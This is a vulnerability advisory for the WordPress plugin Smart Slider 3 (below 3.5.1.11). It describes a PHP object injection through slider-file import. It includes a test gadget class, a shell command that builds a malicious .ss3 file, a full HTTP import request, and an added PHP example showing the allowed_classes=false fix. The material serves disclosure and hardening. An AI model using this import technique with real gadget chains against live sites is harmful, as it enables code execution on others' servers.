wpexploit - Nguyen Duy Quoc Khanh - WPEX-ID:2E28A4E7-E7D3-485C-949C-E300E5B66CBD
Oct 10, 2022 - 12:00 a.m.

Smart Slider 3 < 3.5.1.11 - PHP Object Injection

2022-10-10 00:00:00
Nguyen Duy Quoc Khanh
smart slider 3
php object injection
slider import
gadget chain
arbitrary deserialization
security exploit
wordpress

EPSS

0.001

Percentile

42.9%

The plugin unserialises the content of an imported slider file, which can lead to PHP object injection when a user imports (intentionally or not) a malicious file and a suitable gadget chain is present on the site.

To simulate a gadget chain, put the following code in a plugin:

<?php
/* Plugin Name: Evil gadget (deserialization test) */

// Test-only stand-in for a gadget class: unserialize() of the imported file instantiates it and PHP calls __wakeup().
class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

Create a fake slider:

echo 'O:4:"Evil":0:{};' > data && zip EvilSlider.ss3 data

And import the fake slider in the Smart Slider 3 dashboard.

POST /wp-admin/admin-ajax.php?action=smart-slider3&nextendcontroller=sliders&nextendaction=import&groupID=0&nextend_nonce=e771567d65 HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=---------------------------304866225113075420131015772767
Content-Length: 1416
Cookie:[admin+]

-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="nextend_nonce"

e771567d65
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[upload_or_local]"

0
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[import-file]"; filename="My project(2).ss3"
Content-Type: application/octet-stream

[File data]
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="selectslider[local-import-file]"


-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[local-import-file]"


-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[delete]"

0
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[restore]"

0
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="selectslider[image-mode]"

clone
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[image-mode]"

clone
-----------------------------304866225113075420131015772767--
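
The import path described above, as an added PHP example (not code from the advisory or from Smart Slider 3): a constructed gadget class is fed the PoC's serialized object first through an unrestricted unserialize(), then through one with allowed_classes set to false, which is the minimal fix for an importer that only needs arrays and scalars. The Evil class, its $woken flag and both import functions are assumptions made for this illustration.

```php
<?php
// Added example, not from the WPScan entry or the Smart Slider 3 code base.
// Demonstrates why unserialize() on an imported slider file lets any loaded
// class run its magic methods, and how allowed_classes => false stops that.

// Constructed stand-in for a gadget class loaded on the site (like the PoC's
// plugin class, but it records the call instead of calling die()).
class Evil {
    public static bool $woken = false;
    public function __wakeup(): void {
        self::$woken = true;
    }
}

// Vulnerable pattern: the serialized bytes come straight from the uploaded
// .ss3 archive, and unserialize() instantiates whatever class they name.
function importVulnerable(string $data): mixed {
    return unserialize($data);
}

// Hardened pattern: with allowed_classes => false every object in the input
// becomes __PHP_Incomplete_Class, so no __wakeup()/__destruct() ever runs.
// An importer that only needs arrays and scalars loses nothing; if objects
// are genuinely required, pass an explicit allow-list of class names instead.
function importHardened(string $data): mixed {
    return unserialize($data, ['allowed_classes' => false]);
}

// Constructed sample: the object the PoC writes into the "data" member of the
// zip (without the PoC's trailing ';', which PHP 8.3+ reports as extra data).
$payload = 'O:4:"Evil":0:{}';

foreach (['vulnerable' => 'importVulnerable', 'hardened' => 'importHardened'] as $label => $fn) {
    Evil::$woken = false;
    $obj = $fn($payload);
    // The vulnerable path yields an Evil instance whose __wakeup() has run;
    // the hardened path yields __PHP_Incomplete_Class and the flag stays false.
    printf("%-10s class=%-24s __wakeup ran=%s\n",
        $label, get_class($obj), Evil::$woken ? 'yes' : 'no');
}
```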
